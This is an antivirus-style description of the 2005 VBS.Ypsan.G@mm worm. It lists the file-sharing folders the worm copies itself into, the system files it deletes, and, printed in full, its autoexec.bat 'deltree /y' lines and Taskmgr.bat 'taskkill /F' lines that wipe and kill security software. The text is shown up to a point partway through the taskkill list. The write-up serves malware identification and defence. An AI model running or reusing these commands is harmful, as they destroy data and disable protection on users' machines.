VBS.Ypsan.G@mm
Sunday, 19 June 2005
VBS.Ypsan.G@mm is a mass-mailing worm that sends itself to email addresses gathered from the Windows Address Book and also spreads through file-sharing networks. The worm deletes several files, folders, and registry entries, and attempts to shut down the compromised computer.

Type: Worm
Infection Length: 127,413 bytes.

Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP

When VBS.Ypsan.G@mm is executed, it performs the following actions:


Copies itself to the following locations, if the folders exist:


C:\WINDOWS\System32\WINLOGON.vbs
C:\windows\system\porno.vbs
C:\Virc\Sexy Girls.mpg.vbs
C:\windows\system\system.vbs
C:\windows\system\system32.dll
C:\windows\system\sys32.dll
C:\Program Files\KMD\My Shared Folder\Porno-Pic.Jpg.vbs
C:\Program Files\KMD\My Shared Folder\Sexy girls.jpg.vbs
C:\Program Files\KMD\My Shared Folder\girls.mpg.vbs
C:\Program Files\KMD\My Shared Folder\*****.Gif.vbs
C:\Program Files\KMD\My Shared Folder\Ass.Mpg.vbs
C:\Program Files\KaZaA Lite\My Shared Folder\Porno-Pic.Jpg.vbs
C:\Program Files\KaZaA Lite\My Shared Folder\Sexy girls.jpg.vbs
C:\Program Files\KaZaA Lite\My Shared Folder\girls.mpg.vbs
C:\Program Files\KaZaA Lite\My Shared Folder\*****.Gif.vbs
C:\Program Files\KaZaA Lite\My Shared Folder\Ass.Mpg.vbs
C:\Program Files\Morpheus\My Shared Folder\Porno-Pic.Jpg.vbs
C:\Program Files\Morpheus\My Shared Folder\Sexy girls.jpg.vbs
C:\Program Files\Morpheus\My Shared Folder\girls.mpg.vbs
C:\Program Files\Morpheus\My Shared Folder\*****.Gif.vbs
C:\Program Files\Morpheus\My Shared Folder\Ass.Mpg.vbs
C:\Program Files\BearShare\Shared\Porno-Pic.Jpg.vbs
C:\Program Files\BearShare\Shared\Sexy girls.jpg.vbs
C:\Program Files\BearShare\Shared\girls.mpg.vbs
C:\Program Files\BearShare\Shared\*****.Gif.vbs
C:\Program Files\BearShare\Shared\Ass.Mpg.vbs
C:\Program Files\Edonkey2000\Incoming\Porno-Pic.Jpg.vbs
C:\Program Files\Edonkey2000\Incoming\Sexy girls.jpg.vbs
C:\Program Files\Edonkey2000\Incoming\girls.mpg.vbs
C:\Program Files\Edonkey2000\Incoming\*****.Gif.vbs
C:\Program Files\Edonkey2000\Incoming\Ass.Mpg.vbs
C:\My Downloads\Porno-Pic.Jpg.vbs
C:\My Downloads\Sexy girls.jpg.vbs
C:\My Downloads\girls.mpg.vbs
C:\My Downloads\*****.Gif.vbs
C:\My Downloads\Ass.Mpg.vbs
C:\My Shared Folder\Porno-Pic.Jpg.vbs
C:\My Shared Folder\Sexy girls.jpg.vb
C:\My Shared Folder\girls.mpg.vbs
C:\My Shared Folder\*****.Gif.vbs
C:\My Shared Folder\Ass.Mpg.vbs
C:\Program Files\appleJuice\incoming\Porno-Pic.Jpg.vbs
C:\Program Files\appleJuice\incoming\Sexy girls.jpg.vb
C:\Program Files\appleJuice\incoming\girls.mpg.vbs
C:\Program Files\appleJuice\incoming\*****.Gif.vbs
C:\Program Files\appleJuice\incoming\Ass.Mpg.vbs
C:\Program Files\Gnucleus\Downloads\Porno-Pic.Jpg.vbs
C:\Program Files\Gnucleus\Downloads\Sexy girls.jpg.vb
C:\Program Files\Gnucleus\Downloads\girls.mpg.vbs
C:\Program Files\Gnucleus\Downloads\*****.Gif.vbs
C:\Program Files\Gnucleus\Downloads\Ass.Mpg.vbs
C:\Program Files\Grokster\My Grokster\Porno-Pic.Jpg.vbs
C:\Program Files\Grokster\My Grokster\Sexy girls.jpg.vb
C:\Program Files\Grokster\My Grokster\girls.mpg.vbs
C:\Program Files\Grokster\My Grokster\*****.Gif.vbs
C:\Program Files\Grokster\My Grokster\Ass.Mpg.vbs
C:\Program Files\ICQ\shared files\Porno-Pic.Jpg.vbs
C:\Program Files\ICQ\shared files\Sexy girls.jpg.vb
C:\Program Files\ICQ\shared files\girls.mpg.vbs
C:\Program Files\ICQ\shared files\*****.Gif.vbs
C:\Program Files\ICQ\shared files\Ass.Mpg.vbs
C:\Program Files\KaZaA\My Shared Folder\Porno-Pic.Jpg.vbs
C:\Program Files\KaZaA\My Shared Folder\Sexy girls.jpg.vb
C:\Program Files\KaZaA\My Shared Folder\girls.mpg.vbs
C:\Program Files\KaZaA\My Shared Folder\*****.Gif.vbs
C:\Program Files\KaZaA\My Shared Folder\Ass.Mpg.vbs
C:\Program Files\LimeWire\Shared\Porno-Pic.Jpg.vbs
C:\Program Files\LimeWire\Shared\Sexy girls.jpg.vb
C:\Program Files\LimeWire\Shared\girls.mpg.vbs
C:\Program Files\LimeWire\Shared\*****.Gif.vbs
C:\Program Files\LimeWire\Shared\Ass.Mpg.vbs
C:\Program Files\Overnet\incoming\Porno-Pic.Jpg.vbs
C:\Program Files\Overnet\incoming\Sexy girls.jpg.vb
C:\Program Files\Overnet\incoming\girls.mpg.vbs
C:\Program Files\Overnet\incoming\*****.Gif.vbs
C:\Program Files\Overnet\incoming\Ass.Mpg.vbs
C:\Program Files\Shareaza\Downloads\Porno-Pic.Jpg.vbs
C:\Program Files\Shareaza\Downloads\Sexy girls.jpg.vb
C:\Program Files\Shareaza\Downloads\girls.mpg.vbs
C:\Program Files\Shareaza\Downloads\*****.Gif.vbs
C:\Program Files\Shareaza\Downloads\Ass.Mpg.vbs
C:\Program Files\Swaptor\Download\Porno-Pic.Jpg.vbs
C:\Program Files\Swaptor\Download\Sexy girls.jpg.vb
C:\Program Files\Swaptor\Download\girls.mpg.vbs
C:\Program Files\Swaptor\Download\*****.Gif.vbs
C:\Program Files\Swaptor\Download\Ass.Mpg.vbs
C:\Program Files\WinMX\My Shared Folder\Porno-Pic.Jpg.vbs
C:\Program Files\WinMX\My Shared Folder\Sexy girls.jpg.vb
C:\Program Files\WinMX\My Shared Folder\girls.mpg.vbs
C:\Program Files\WinMX\My Shared Folder\*****.Gif.vbs
C:\Program Files\WinMX\My Shared Folder\Ass.Mpg.vbs
C:\Program Files\Tesla\Files\Porno-Pic.Jpg.vbs
C:\Program Files\Tesla\Files\Sexy girls.jpg.vb
C:\Program Files\Tesla\Files\girls.mpg.vbs
C:\Program Files\Tesla\Files\*****.Gif.vbs
C:\Program Files\Tesla\Files\Ass.Mpg.vbs
C:\Program Files\XoloX\Downloads\Porno-Pic.Jpg.vbs
C:\Program Files\XoloX\Downloads\Sexy girls.jpg.vb
C:\Program Files\XoloX\Downloads\girls.mpg.vbs
C:\Program Files\XoloX\Downloads\*****.Gif.vbs
C:\Program Files\XoloX\Downloads\Ass.Mpg.vbs
C:\Program Files\Rapigator\Share\Porno-Pic.Jpg.vbs
C:\Program Files\Rapigator\Share\Sexy girls.jpg.vb
C:\Program Files\Rapigator\Share\girls.mpg.vbs
C:\Program Files\Rapigator\Share\*****.Gif.vbs
C:\Program Files\Rapigator\Share\Ass.Mpg.vbs


Deletes the following files to disable various programs and lower security settings:


C:\Windows\System32\taskmgr.exe
C:\Windows\System32\wuauclt1.exe
C:\Windows\System32\wuauclt.exe
C:\Windows\System32\wupdmgr.exe
C:\Windows\Regedit.exe
C:\Program Files\Lavasoft\Ad-Aware SE Professional\defs.ref
C:\Program Files\Lavasoft\Ad-Aware SE Professional\sites.txt
C:\WINDOWS\system32\dumprep.exe
C:\WINDOWS\inf\machine.inf


Deletes the following folders:


C:\WINDOWS\repair
C:\WINDOWS\system32\ReinstallBackups


Overwrites C:\autoexec.bat with the following lines to lower security settings:

@deltree/y c:\antiba~1\*.* >nul
@deltree/y c:\antiba~2\*.* >nul
@deltree/y c:\antiba~1.1\*.* >nul
@deltree/y c:\antiba~1.2\*.* >nul
@deltree/y c:\antiba~1.3\*.* >nul
@deltree/y c:\antiba~1.4\*.* >nul
@deltree/y c:\antiba~1.5\*.* >nul
@deltree/y c:\antiba~1.6\*.* >nul
@deltree/y c:\antiba~1.7\*.* >nul
@deltree/y c:\antiba~1.8\*.* >nul
@deltree/y c:\antivi~1\*.* >nul
@deltree/y c:\antivi~2\*.* >nul
@deltree/y c:\antiviru\*.* >nul
@deltree/y c:\avg\*.* >nul
@deltree/y c:\avp\*.* >nul
@deltree/y c:\avp30\*.* >nul
@deltree/y c:\avx\*.* >nul
@deltree/y c:\avpers~1\*.* >nul
@deltree/y c:\bitdef~1\*.* >nul
@deltree/y c:\bitdef~2\*.* >nul
@deltree/y c:\comman~1\*.* >nul
@deltree/y c:\cleancih\*.* >nul
@deltree/y c:\esafen\*.* >nul
@deltree/y c:\findvi~1\*.* >nul
@deltree/y c:\f-macro\*.* >nul
@deltree/y c:\f-prot\*.* >nul
@deltree/y c:\f-prot95\*.* >nul
@deltree/y c:\f-secu~1\*.* >nul
@deltree/y c:\fwin\*.* >nul
@deltree/y c:\fwin32\*.* >nul
@deltree/y c:\inocul~1\*.* >nul
@deltree/y c:\inocul~2\*.* >nul
@deltree/y c:\kasper~1\*.* >nul
@deltree/y c:\kasper~2\*.* >nul
@deltree/y c:\mcafee\*.* >nul
@deltree/y c:\mcafee~1\*.* >nul
@deltree/y c:\msav\*.* >nul
@deltree/y c:\norman\*.* >nul
@deltree/y c:\norton~1\*.* >nul
@deltree/y c:\norton~2\*.* >nul
@deltree/y c:\pav\*.* >nul
@deltree/y c:\pccill~1\*.* >nul
@deltree/y c:\pc-cil~1\*.* >nul
@deltree/y c:\nav\*.* >nul
@deltree/y c:\softwin\*.* >nul
@deltree/y c:\tbav\*.* >nul
@deltree/y c:\tbavw95\*.* >nul
@deltree/y c:\toolkit\*.* >nul
@deltree/y c:\trendm~1\*.* >nul
@deltree/y c:\trex\*.* >nul
@deltree/y c:\virus\*.* >nul
@deltree/y c:\vpc\*.* >nul
@deltree/y c:\vs95\*.* >nul
@deltree/y c:\zonela~1\*.* >nul
@deltree/y c:\zonela~2\*.* >nul
@deltree/y c:\progra~1\antiba~1\*.* >nul
@deltree/y c:\progra~1\antiba~2\*.* >nul
@deltree/y c:\progra~1\antiba~1.1\*.* >nul
@deltree/y c:\progra~1\antiba~1.2\*.* >nul
@deltree/y c:\progra~1\antiba~1.3\*.* >nul
@deltree/y c:\progra~1\antiba~1.4\*.* >nul
@deltree/y c:\progra~1\antiba~1.5\*.* >nul
@deltree/y c:\progra~1\antiba~1.6\*.* >nul
@deltree/y c:\progra~1\antiba~1.7\*.* >nul
@deltree/y c:\progra~1\antiba~1.8\*.* >nul
@deltree/y c:\progra~1\antivi~1\*.* >nul
@deltree/y c:\progra~1\antivi~2\*.* >nul
@deltree/y c:\progra~1\avg\*.* >nul
@deltree/y c:\progra~1\avp\*.* >nul
@deltree/y c:\progra~1\avx\*.* >nul
@deltree/y c:\progra~1\avx2000\*.* >nul
@deltree/y c:\progra~1\avpers~1\*.* >nul
@deltree/y c:\progra~1\bitdef~1\*.* >nul
@deltree/y c:\progra~1\bitdef~2\*.* >nul
@deltree/y c:\progra~1\comman~1\*.* >nul
@deltree/y c:\progra~1\common~1\avpsha~1\*.* >nul
@deltree/y c:\progra~1\common~1\symant~1\*.* >nul
@deltree/y c:\progra~1\datafe~1\*.* >nul
@deltree/y c:\progra~1\deerfi~1.com\*.* >nul
@deltree/y c:\progra~1\f-prot\*.* >nul
@deltree/y c:\progra~1\f-prot95\*.* >nul
@deltree/y c:\progra~1\findvi~1\*.* >nul
@deltree/y c:\progra~1\f-secu~1\*.* >nul
@deltree/y c:\progra~1\f-secure\*.* >nul
@deltree/y c:\progra~1\fsi\*.* >nul
@deltree/y c:\progra~1\fwin\*.* >nul
@deltree/y c:\progra~1\fwin32\*.* >nul
@deltree/y c:\progra~1\grisoft\*.* >nul
@deltree/y c:\progra~1\inocul~1\*.* >nul
@deltree/y c:\progra~1\inocul~2\*.* >nul
@deltree/y c:\progra~1\intern~2\*.* >nul
@deltree/y c:\progra~1\kasper~1\*.* >nul
@deltree/y c:\progra~1\kasper~2\*.* >nul
@deltree/y c:\progra~1\mcafee\*.* >nul
@deltree/y c:\progra~1\mcafee~1\*.* >nul
@deltree/y c:\progra~1\mindso~1\*.* >nul
@deltree/y c:\progra~1\norman\*.* >nul
@deltree/y c:\progra~1\norton~1\*.* >nul
@deltree/y c:\progra~1\norton~2\*.* >nul
@deltree/y c:\progra~1\pandas~1\*.* >nul
@deltree/y c:\progra~1\protec~1\*.* >nul
@deltree/y c:\progra~1\protec~2\*.* >nul
@deltree/y c:\progra~1\quickh~1\*.* >nul
@deltree/y c:\progra~1\nav\*.* >nul
@deltree/y c:\progra~1\signal9\*.* >nul
@deltree/y c:\progra~1\softwin\*.* >nul
@deltree/y c:\progra~1\spysto~1\*.* >nul
@deltree/y c:\progra~1\symant~1\*.* >nul
@deltree/y c:\progra~1\tbav\*.* >nul
@deltree/y c:\progra~1\tinype~1\*.* >nul
@deltree/y c:\progra~1\trendm~1\*.* >nul
@deltree/y c:\progra~1\trendp~1\*.* >nul
@deltree/y c:\progra~1\trojan~1\*.* >nul
@deltree/y c:\progra~1\trojan~2\*.* >nul
@deltree/y c:\progra~1\virusm~1.0\*.* >nul
@deltree/y c:\progra~1\zonela~1\*.* >nul
@deltree/y c:\progra~1\zonela~2\*.* >nul


Overwrites C:\WINDOWS\System32\Taskmgr.bat with the following lines:

@taskkill /IM ACKWIN32.exe /F
@taskkill /IM ADAWARE.exe /F
@taskkill /IM ADVXDWIN.exe /F
@taskkill /IM AGENTSVR.exe /F
@taskkill /IM AGENTW.exe /F
@taskkill /IM ALERTSVC.exe /F
@taskkill /IM ALEVIR.exe /F
@taskkill /IM ALOGSERV.exe /F
@taskkill /IM AMON9X.exe /F
@taskkill /IM ANTI-TROJAN.exe /F
@taskkill /IM ANTIVIRUS.exe /F
@taskkill /IM ANTS.exe /F
@taskkill /IM APIMONITOR.exe /F
@taskkill /IM APLICA32.exe /F
@taskkill /IM APVXDWIN.exe /F
@taskkill /IM ARR.exe /F
@taskkill /IM ATCON.exe /F
@taskkill /IM ATGUARD.exe /F
@taskkill /IM ATRO55EN.exe /F
@taskkill /IM ATUPDATER.exe /F
@taskkill /IM ATUPDATER.exe /F
@taskkill /IM ATWATCH.exe /F
@taskkill /IM AU.exe /F
@taskkill /IM AUPDATE.exe /F
@taskkill /IM AUPDATE.exe /F
@taskkill /IM AUTODOWN.exe /F
@taskkill /IM AUTODOWN.exe /F
@taskkill /IM AUTOTRACE.exe /F
@taskkill /IM AUTOTRACE.exe /F
@taskkill /IM AUTOUPDATE.exe /F
@taskkill /IM AUTOUPDATE.exe /F
@taskkill /IM AVCONSOL.exe /F
@taskkill /IM AVE32.exe /F
@taskkill /IM AVGCC32.exe /F
@taskkill /IM AVGCTRL.exe /F
@taskkill /IM AVGNT.exe /F
@taskkill /IM AVGSERV.exe /F
@taskkill /IM AVGSERV9.exe /F
@taskkill /IM AVGUARD.exe /F
@taskkill /IM AVGW.exe /F
@taskkill /IM AVKPOP.exe /F
@taskkill /IM AVKSERV.exe /F
@taskkill /IM AVKSERVICE.exe /F
@taskkill /IM AVKWCTl9.exe /F
@taskkill /IM AVLTMAIN.exe /F
@taskkill /IM AVNT.exe /F
@taskkill /IM AVP.exe /F
@taskkill /IM AVP32.exe /F
@taskkill /IM AVPCC.exe /F
@taskkill /IM AVPDOS32.exe /F
@taskkill /IM AVPM.exe /F
@taskkill /IM AVPTC32.exe /F
@taskkill /IM AVPUPD.exe /F
@taskkill /IM AVPUPD.exe /F
@taskkill /IM AVSCHED32.exe /F
@taskkill /IM AVSYNMGR.exe /F
@taskkill /IM AVWINNT.exe /F
@taskkill /IM AVWUPD.exe /F
@taskkill /IM AVWUPD32.exe /F
@taskkill /IM AVWUPD32.exe /F
@taskkill /IM AVWUPSRV.exe /F
@taskkill /IM AVXMONITOR9X.exe /F
@taskkill /IM AVXMONITORNT.exe /F
@taskkill /IM AVXQUAR.exe /F
@taskkill /IM AVXQUAR.exe /F
@taskkill /IM BACKWEB.exe /F
@taskkill /IM BARGAINS.exe /F
@taskkill /IM BD_PROFESSIONAL.exe /F
@taskkill /IM BEAGLE.exe /F
@taskkill /IM BELT.exe /F
@taskkill /IM BIDEF.exe /F
@taskkill /IM BIDSERVER.exe /F
@taskkill /IM BIPCP.exe /F
@taskkill /IM BIPCPEVALSETUP.exe /F
@taskkill /IM BISP.exe /F
@taskkill /IM BLACKD.exe /F
@taskkill /IM BLACKICE.exe /F
@taskkill /IM BLSS.exe /F
@taskkill /IM BOOTCONF.exe /F
@taskkill /IM BOOTWARN.exe /F
@taskkill /IM BORG2.exe /F
@taskkill /IM BPC.exe /F
@taskkill /IM BRASIL.exe /F
@taskkill /IM BS120.exe /F
@taskkill /IM BUNDLE.exe /F
@taskkill /IM BVT.exe /F
@taskkill /IM CCAPP.exe /F
@taskkill /IM CCEVTMGR.exe /F
@taskkill /IM CCPXYSVC.exe /F
@taskkill /IM CDP.exe /F
@taskkill /IM CFD.exe /F
@taskkill /IM CFGWIZ.exe /F
@taskkill /IM CFIADMIN.exe /F
@taskkill /IM CFIAUDIT.exe /F
@taskkill /IM CFIAUDIT.exe /F
@taskkill /IM CFINET.exe /F
@taskkill /IM CFINET32.exe /F
@taskkill /IM CLEAN.exe /F
@taskkill /IM CLEANER.exe /F
@taskkill /IM CLEANER3.exe /F
@taskkill /IM CLEANPC.exe /F
@taskkill /IM CLICK.exe /F
@taskkill /IM CMD32.exe /F
@taskkill /IM CMESYS.exe /F
@taskkill /IM CMGRDIAN.exe /F
@taskkill /IM CMON016.exe /F
@taskkill /IM CONNECTIONMONITOR.exe /F
@taskkill /IM CPD.exe /F
@taskkill /IM CPF9X206.exe /F
@taskkill /IM CPFNT206.exe /F
@taskkill /IM CTRL.exe /F
@taskkill /IM CV.exe /F
@taskkill /IM CWNB181.exe /F
@taskkill /IM CWNTDWMO.exe /F
@taskkill /IM CLAW95CF.exe /F
@taskkill /IM DATEMANAGER.exe /F
@taskkill /IM DCOMX.exe /F
@taskkill /IM DEFALERT.exe /F
@taskkill /IM DEFSCANGUI.exe /F
@taskkill /IM DEFWATCH.exe /F
@taskkill /IM DEPUTY.exe /F
@taskkill /IM DIVX.exe /F
@taskkill /IM DLLCACHE.exe /F
@taskkill /IM DLLREG.exe /F
@taskkill /IM DOORS.exe /F
@taskkill /IM DPF.exe /F
@taskkill /IM DPFSETUP.exe /F
@taskkill /IM DPPS2.exe /F
@taskkill /IM DRWATSON.exe /F
@taskkill /IM DRWEB32.exe /F
@taskkill /IM DRWEBUPW.exe /F
@taskkill /IM DSSAGENT.exe /F
@taskkill /IM DVP95.exe /F
@taskkill /IM DVP95_0.exe /F
@taskkill /IM ECENGINE.exe /F
@taskkill /IM EFPEADM.exe /F
@taskkill /IM EMSW.exe /F
@taskkill /IM ENT.exe /F
@taskkill /IM ESAFE.exe /F
@taskkill /IM ESCANHNT.exe /F
@taskkill /IM ESCANV95.exe /F
@taskkill /IM ESPWATCH.exe /F
@taskkill /IM ETHEREAL.exe /F
@taskkill /IM ETRUSTCIPE.exe /F
@taskkill /IM EVPN.exe /F
@taskkill /IM EXANTIVIRUS-CNET.exe /F
@taskkill /IM EXE.AVXW.exe /F
@taskkill /IM EXPERT.exe /F
@taskkill /IM EXPLORE.exe /F
@taskkill /IM F-PROT.exe /F
@taskkill /IM F-PROT95.exe /F
@taskkill /IM F-STOPW.exe /F
@taskkill /IM FAMEH32.exe /F
@taskkill /IM FAST.exe /F
@taskkill /IM FCH32.exe /F
@taskkill /IM FIH32.exe /F
@taskkill /IM FINDVIRU.exe /F
@taskkill /IM FIREWALL.exe /F
@taskkill /IM FNRB32.exe /F
@taskkill /IM FP-WIN.exe /F
@taskkill /IM FP-WIN_TRIAL.exe /F
@taskkill /IM FPROT.exe /F
@taskkill /IM FRW.exe /F
@taskkill /IM FSAA.exe /F
@taskkill /IM FSAV.exe /F
@taskkill /IM FSAV32.exe /F
@taskkill /IM FSAV530STBYB.exe /F
@taskkill /IM FSAV530WTBYB.exe /F
@taskkill /IM FSAV95.exe /F
@taskkill /IM FSGK32.exe /F
@taskkill /IM FSM32.exe /F
@taskkill /IM FSMA32.exe /F
@taskkill /IM FSMB32.exe /F
@taskkill /IM GATOR.exe /F
@taskkill /IM GBMENU.exe /F
@taskkill /IM GBPOLL.exe /F
@taskkill /IM GENERICS.exe /F
@taskkill /IM GMT.exe /F
@taskkill /IM GUARD.exe /F
@taskkill /IM GUARDDOG.exe /F
@taskkill /IM HACKTRACERSETUP.exe /F
@taskkill /IM HBINST.exe /F
@taskkill /IM HBSRV.exe /F
@taskkill /IM HOTACTIO.exe /F
@taskkill /IM HOTPATCH.exe /F
@taskkill /IM HTLOG.exe /F
@taskkill /IM HTPATCH.exe /F
@taskkill /IM HWPE.exe /F
@taskkill /IM HXDL.exe /F
@taskkill /IM HXIUL.exe /F
@taskkill /IM IAMAPP.exe /F
@taskkill /IM IAMSERV.exe /F
@taskkill /IM IAMSTATS.exe /F
@taskkill /IM IBMASN.exe /F
@taskkill /IM IBMAVSP.exe /F
@taskkill /IM ICLOADNT.exe /F
@taskkill /IM ICMON.exe /F
@taskkill /IM ICSUPP95.exe /F
@taskkill /IM ICSUPPNT.exe /F
@taskkill /IM IDLE.exe /F
@taskkill /IM IEDLL.exe /F
@taskkill /IM IEDRIVER.exe /F
@taskkill /IM IEXPLORER.exe /F
@taskkill /IM IFACE.exe /F
@taskkill /IM IFW2000.exe /F
@taskkill /IM INETLNFO.exe /F
@taskkill /IM INFUS.exe /F
@taskkill /IM INFWIN.exe /F
@taskkill /IM INIT.exe /F
@taskkill /IM INTDEL.exe /F
@taskkill /IM INTREN.exe /F
@taskkill /IM IOMON98.exe /F
@taskkill /IM ISTSVC.exe /F
@taskkill /IM JAMMER.exe /F
@taskkill /IM JDBGMRG.exe /F
@taskkill /IM JEDI.exe /F
@taskkill /IM KAVLITE40ENG.exe /F
@taskkill /IM KAVPERS40ENG.exe /F
@taskkill /IM KAVPF.exe /F
@taskkill /IM KAZZA.exe /F
@taskkill /IM KEENVALUE.exe /F
@taskkill /IM KERIO-PF-213-EN-WIN.exe /F
@taskkill /IM KERIO-WRL-421-EN-WIN.exe /F
@taskkill /IM KERIO-WRP-421-EN-WIN.exe /F
@taskkill /IM KERNEL32.exe /F
@taskkill /IM KILLPROCESSSETUP161.exe /F
@taskkill /IM LAUNCHER.exe /F
@taskkill /IM LDNETMON.exe /F
@taskkill /IM LDPRO.exe /F
@taskkill /IM LDPROMENU.exe /F
@taskkill /IM LDSCAN.exe /F
@taskkill /IM LNETINFO.exe /F
@taskkill /IM LOADER.exe /F
@taskkill /IM LOCALNET.exe /F
@taskkill /IM LOCKDOWN.exe /F
@taskkill /IM LOCKDOWN2000.exe /F
@taskkill /IM LOOKOUT.exe /F
@taskkill /IM LORDPE.exe /F
@taskkill /IM LSETUP.exe /F
@taskkill /IM LUALL.exe /F
@taskkill /IM LUALL.exe /F
@taskkill /IM LUAU.exe /F
@taskkill /IM LUCOMSERVER.exe /F
@taskkill /IM LUINIT.exe /F
@taskkill /IM LUSPT.exe /F
@taskkill /IM MAPISVC32.exe /F
@taskkill /IM MCAGENT.exe /F
@taskkill /IM MCMNHDLR.exe /F
@taskkill /IM MCSHIELD.exe /F
@taskkill /IM MCTOOL.exe /F
@taskkill /IM MCUPDATE.exe /F
@taskkill /IM MCUPDATE.exe /F
@taskkill /IM MCVSRTE.exe /F
@taskkill /IM MCVSSHLD.exe /F
@taskkill /IM MD.exe /F
@taskkill /IM MFIN32.exe /F
@taskkill /IM MFW2EN.exe /F
@taskkill /IM MFWENG3.02D30.exe /F
@taskkill /IM MGAVRTCL.exe /F
@taskkill /IM MGAVRTE.exe /F
@taskkill /IM MGHTML.exe /F
@taskkill /IM MGUI.exe /F
@taskkill /IM MINILOG.exe /F
@taskkill /IM MMOD.exe /F
@taskkill /IM MONITOR.exe /F
@taskkill /IM MOOLIVE.exe /F
@taskkill /IM MOSTAT.exe /F
@taskkill /IM MPFAGENT.exe /F
@taskkill /IM MPFSERVICE.exe /F
@taskkill /IM MPFTRAY.exe /F
@taskkill /IM MRFLUX.exe /F
@taskkill /IM MSAPP.exe /F
@taskkill /IM MSBB.exe /F
@taskkill /IM MSBLAST.exe /F
@taskkill /IM MSCACHE.exe /F
@taskkill /IM MSCCN32.exe /F
@taskkill /IM MSCMAN.exe /F
@taskkill /IM MSCONFIG.exe /F
@taskkill /IM MSDM.exe /F
@taskkill /IM MSDOS.exe /F
@taskkill /IM MSIEXEC16.exe /F
@taskkill /IM MSINFO32.exe /F
@taskkill /IM MSLAUGH.exe /F
@taskkill /IM MSMGT.exe /F
@taskkill /IM MSMSGRI32.exe /F
@taskkill /IM MSSMMC32.exe /F
@taskkill /IM MSSYS.exe /F
@taskkill /IM MSVXD.exe /F
@taskkill /IM MU0311AD.exe /F
@taskkill /IM MWATCH.exe /F
@taskkill /IM N32SCANW.exe /F
@taskkill /IM NAV.exe /F
@taskkill /IM AUTO-PROTECT.NAV80TRY.exe /F
@taskkill /IM NAVAP.NAVAPSVC.exe /F
@taskkill /IM NAVAPSVC.exe /F
@taskkill /IM NAVAPW32.exe /F
@taskkill /IM NAVDX.exe /F
@taskkill /IM NAVLU32.exe /F
@taskkill /IM NAVNT.exe /F
@taskkill /IM NAVSTUB.exe /F
@taskkill /IM NAVW32.exe /F
@taskkill /IM NAVWNT.exe /F
@taskkill /IM NC2000.exe /F
@taskkill /IM NCINST4.exe /F
@taskkill /IM NDD32.exe /F
@taskkill /IM NEOMONITOR.exe /F
@taskkill /IM NEOWATCHLOG.exe /F
@taskkill /IM NETARMOR.exe /F
@taskkill /IM NETD32.exe /F
@taskkill /IM NETINFO.exe /F
@taskkill /IM NETMON.exe /F
@taskkill /IM NETSCANPRO.exe /F
@taskkill /IM NETSPYHUNTER-1.2.exe /F
@taskkill /IM NETSTAT.exe /F
@taskkill /IM NETUTILS.exe /F
@taskkill /IM NISSERV.exe /F
@taskkill /IM NISUM.exe /F
@taskkill /IM NMAIN.exe /F
@taskkill /IM NOD32.exe /F
@taskkill /IM NORMIST.exe /F
@taskkill /IM NORTON_INTERNET_SECU_3.0_407.exe /F
@taskkill /IM NOTSTART.exe /F
@taskkill /IM NPF40_TW_98_NT_ME_2K.exe /F
@taskkill /IM NPFMESSENGER.exe /F
@taskkill /IM NPROTECT.exe /F
@taskkill /IM NPSCHECK.exe /F
@taskkill /IM NPSSVC.exe /F
@taskkill /IM NSCHED32.exe /F
@taskkill /IM NSSYS32.exe /F
@taskkill /IM NSTASK32.exe /F
@taskkill /IM NSUPDATE.exe /F
@taskkill /IM NT.exe /F
@taskkill /IM NTRTSCAN.exe /F
@taskkill /IM NTVDM.exe /F
@taskkill /IM NTXconfig.exe /F
@taskkill /IM NUI.exe /F
@taskkill /IM NUPGRADE.exe /F
@taskkill /IM NUPGRADE.exe /F
@taskkill /IM NVARCH16.exe /F
@taskkill /IM NVC95.exe /F
@taskkill /IM NVSVC32.exe /F
@taskkill /IM NWINST4.exe /F
@taskkill /IM NWSERVICE.exe /F
@taskkill /IM NWTOOL16.exe /F
@taskkill /IM OLLYDBG.exe /F
@taskkill /IM ONSRVR.exe /F
@taskkill /IM OPTIMIZE.exe /F
@taskkill /IM OSTRONET.exe /F
@taskkill /IM OTFIX.exe /F
@taskkill /IM OUTPOST.exe /F
@taskkill /IM OUTPOST.exe /F
@taskkill /IM OUTPOSTINSTALL.exe /F
@taskkill /IM OUTPOSTPROINSTALL.exe /F
@taskkill /IM PADMIN.exe /F
@taskkill /IM PANIXK.exe /F
@taskkill /IM PATCH.exe /F
@taskkill /IM PAVCL.exe /F
@taskkill /IM PAVPROXY.exe /F
@taskkill /IM PAVSCHED.exe /F
@taskkill /IM PAVW.exe /F
@taskkill /IM PCFWALLICON.exe /F
@taskkill /IM PCIP10117_0.exe /F
@taskkill /IM PCSCAN.exe /F
@taskkill /IM PDSETUP.exe /F
@taskkill /IM PERISCOPE.exe /F
@taskkill /IM PERSFW.exe /F
@taskkill /IM PERSWF.exe /F
@taskkill /IM PF2.exe /F
@taskkill /IM PFWADMIN.exe /F
@taskkill /IM PGMONITR.exe /F
@taskkill /IM PINGSCAN.exe /F
@taskkill /IM PLATIN.exe /F
@taskkill /IM POP3TRAP.exe /F
@taskkill /IM POPROXY.exe /F
@taskkill /IM POPSCAN.exe /F
@taskkill /IM PORTDETECTIVE.exe /F
@taskkill /IM PORTMONITOR.exe /F
@taskkill /IM POWERSCAN.exe /F
@taskkill /IM PPINUPDT.exe /F
@taskkill /IM PPTBC.exe /F
@taskkill /IM PPVSTOP.exe /F
@taskkill /IM PRIZESURFER.exe /F
@taskkill /IM PRMT.exe /F
@taskkill /IM PRMVR.exe /F
@taskkill /IM PROCDUMP.exe /F
@taskkill /IM PROCESSMONITOR.exe /F
@taskkill /IM PROCEXPLORERV1.0.exe /F
@taskkill /IM PROGRAMAUDITOR.exe /F
@taskkill /IM PROPORT.exe /F
@taskkill /IM PROTECTX.exe /F
@taskkill /IM PSPF.exe /F
@taskkill /IM PURGE.exe /F
@taskkill /IM QCONSOLE.exe /F
@taskkill /IM QSERVER.exe /F
@taskkill /IM RAPAPP.exe /F
@taskkill /IM RAV7.exe /F
@taskkill /IM RAV7WIN.exe /F
@taskkill /IM RAV8WIN32ENG.exe /F
@taskkill /IM RAY.exe /F
@taskkill /IM RB32.exe /F
@taskkill /IM RCSYNC.exe /F
@taskkill /IM REALMON.exe /F
@taskkill /IM REGED.exe /F
@taskkill /IM REGEDIT.exe /F
@taskkill /IM REGEDT32.exe /F
@taskkill /IM RESCUE.exe /F
@taskkill /IM RESCUE32.exe /F
@taskkill /IM RRGUARD.exe /F
@taskkill /IM RSHELL.exe /F
@taskkill /IM RTVSCAN.exe /F
@taskkill /IM RTVSCN95.exe /F
